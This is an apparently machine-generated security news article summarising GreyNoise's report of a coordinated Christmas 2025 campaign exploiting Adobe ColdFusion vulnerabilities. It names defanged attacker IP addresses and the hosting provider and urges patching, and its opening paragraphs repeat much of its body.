Ethical Hacking News
GreyNoise has identified a significant threat actor exploiting over a dozen Adobe ColdFusion vulnerabilities during the Christmas 2025 holiday period, highlighting the ongoing threat landscape in the cybersecurity world. Thousands of attack attempts were observed, with most coming from two IP addresses hosted by CTG Server Limited. The attackers' use of automated behavior and coordinated exploitation techniques suggests that this is a well-organized operation designed to maximize impact.
GreyNoise has identified a significant threat actor exploiting Adobe ColdFusion server vulnerabilities during the Christmas 2025 holiday period. The attackers, operating from Japan-based infrastructure, have been systematically exploiting over a dozen ColdFusion CVEs from 2023-2024 using ProjectDiscovery Interactsh for out-of-band verification. Two IP addresses (134.122.136[.]119 and 134.122.136[.]96) accounted for over 98% of observed ColdFusion exploitation traffic, suggesting they are the primary entry point and delivery vector for the malicious payload. A handful of secondary IPs across Canada, India, and the US were used for reconnaissance and other support functions to avoid detection by traditional security controls. The attackers' use of automated behavior cycling through multiple attack types suggests a well-organized operation designed to maximize impact. Keeping ColdFusion servers up-to-date and patched is crucial to prevent exploitation, as these systems are still widely used by many organizations.
GreyNoise, a cybersecurity organization, has identified a significant threat actor that has been actively exploiting vulnerabilities in Adobe ColdFusion servers during the Christmas 2025 holiday period. The organization's researchers have observed thousands of attack attempts, with the vast majority coming from two IP addresses hosted by CTG Server Limited (AS152194), a Hong Kong-based provider with prior links to various malicious activities.
The coordinated campaign, which appears to be a single threat actor operating from Japan-based infrastructure, has been systematically exploiting over a dozen ColdFusion CVEs from 2023-2024. The attacks used ProjectDiscovery Interactsh for out-of-band verification, with JNDI/LDAP injection as the primary vector. Most of the activity occurred on Christmas Day, suggesting deliberate timing to exploit reduced security monitoring.
According to GreyNoise's analysis, the two IP addresses responsible for the majority of the traffic – 134.122.136[.]119 and 134.122.136[.]96 – accounted for over 98% of all observed ColdFusion exploitation traffic. This suggests that these IP addresses are not only the primary entry point for the threat actor but also the main vector for delivering the malicious payload.
In addition to the two IP addresses, GreyNoise has also identified a handful of secondary IPs across Canada, India, and the US that made up minor activity in the campaign. These secondary IPs were used for reconnaissance and other support functions, likely to avoid detection by traditional security controls.
The attackers' use of automated, coordinated behavior cycling through multiple attack types suggests that this is a well-organized operation designed to maximize the impact of their efforts. The attackers have also shown an interest in deserialization RCE, which is a technique used to exploit certain vulnerabilities in Adobe ColdFusion.
GreyNoise's findings highlight the importance of keeping ColdFusion servers up-to-date and patched, as these systems are still widely used by many organizations. The organization's researchers believe that this campaign may be part of a larger vulnerability scanning effort, with the attackers targeting more than 767 CVEs across various technology stacks.
The scale and breadth of this campaign demonstrate the significant threat posed by organized cyberactors operating from the shadows. As organizations continue to rely on outdated systems and patching schedules, they risk becoming vulnerable to such large-scale exploitation campaigns.
In conclusion, GreyNoise's discovery of a coordinated exploitation campaign targeting ColdFusion vulnerabilities highlights the ongoing threat landscape in the cybersecurity world. The organization's findings underscore the importance of staying vigilant and taking proactive measures to protect against such threats.
Related Information:
https://www.ethicalhackingnews.com/articles/GreyNoise-Uncovers-a-Large-Scale-Exploitation-Campaign-Targeting-ColdFusion-Vulnerabilities-ehn.shtml
https://securityaffairs.com/186450/uncategorized/thousands-of-coldfusion-exploit-attempts-spotted-during-christmas-holiday.html
Published: Sat Jan 3 06:02:16 2026 by llama3.2 3B Q4_K_M
